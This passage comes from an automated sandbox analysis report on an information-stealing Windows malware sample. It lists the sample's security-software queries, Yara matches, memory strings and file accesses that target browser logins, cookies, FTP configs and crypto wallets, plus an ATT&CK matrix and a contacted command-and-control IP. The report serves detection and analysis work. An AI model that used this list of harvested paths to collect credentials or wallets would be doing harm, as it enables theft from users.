                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nzLoHpgAln.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: nzLoHpgAln.exe PID: 7312, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7732, type: MEMORYSTR
                  Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                  Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                  Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                  Source: nzLoHpgAln.exe, 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                  Source: nzLoHpgAln.exe, 00000008.00000002.1859385903.0000000002ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                  Source: C:\Users\user\Desktop\nzLoHpgAln.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                  Source: C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                  Source: Yara matchFile source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nzLoHpgAln.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: nzLoHpgAln.exe PID: 7312, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7732, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nzLoHpgAln.exe.3eccbe8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.nzLoHpgAln.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.wZWwzQVEakJvEU.exe.4435590.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.wZWwzQVEakJvEU.exe.3c35570.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nzLoHpgAln.exe.3eccbe8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nzLoHpgAln.exe.3e13fa8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.nzLoHpgAln.exe.3e705c8.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: nzLoHpgAln.exe PID: 6176, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: nzLoHpgAln.exe PID: 7312, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7408, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: wZWwzQVEakJvEU.exe PID: 7732, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                  Windows Management Instrumentation
                  1
                  Scheduled Task/Job
                  111
                  Process Injection
                  1
                  Masquerading
                  1
                  OS Credential Dumping
                  331
                  Security Software Discovery
                  Remote Services1
                  Archive Collected Data
                  1
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job
                  1
                  DLL Side-Loading
                  1
                  Scheduled Task/Job
                  11
                  Disable or Modify Tools
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop Protocol3
                  Data from Local System
                  11
                  Non-Standard Port
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading
                  241
                  Virtualization/Sandbox Evasion
                  Security Account Manager241
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                  Process Injection
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture12
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information
                  LSA Secrets1
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts32
                  Software Packing
                  Cached Domain Credentials113
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583001 Sample: nzLoHpgAln.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 50 api.ip.sb 2->50 54 Suricata IDS alerts for network traffic 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 10 other signatures 2->60 8 nzLoHpgAln.exe 7 2->8         started        12 wZWwzQVEakJvEU.exe 2->12         started        signatures3 process4 file5 42 C:\Users\user\AppData\...\wZWwzQVEakJvEU.exe, PE32 8->42 dropped 44 C:\...\wZWwzQVEakJvEU.exe:Zone.Identifier, ASCII 8->44 dropped 46 C:\Users\user\AppData\Local\...\tmpC18A.tmp, XML 8->46 dropped 48 C:\Users\user\AppData\...\nzLoHpgAln.exe.log, ASCII 8->48 dropped 62 Detected unpacking (changes PE section rights) 8->62 64 Detected unpacking (overwrites its own PE header) 8->64 66 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->66 74 3 other signatures 8->74 14 nzLoHpgAln.exe 15 49 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        68 Multi AV Scanner detection for dropped file 12->68 70 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 12->70 72 Injects a PE file into a foreign processes 12->72 24 wZWwzQVEakJvEU.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 185.222.57.76, 49736, 49738, 49739 ROOTLAYERNETNL Netherlands 14->52 76 Found many strings related to Crypto-Wallets (likely being stolen) 14->76 78 Tries to steal Crypto Currency Wallets 14->78 28 conhost.exe 14->28         started        80 Loading BitLocker PowerShell Module 18->80 30 conhost.exe 18->30         started        32 WmiPrvSE.exe 18->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        82 Tries to harvest and steal browser information (history, passwords, etc) 24->82 38 conhost.exe 24->38         started        40 conhost.exe 26->40         started        signatures9 process10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.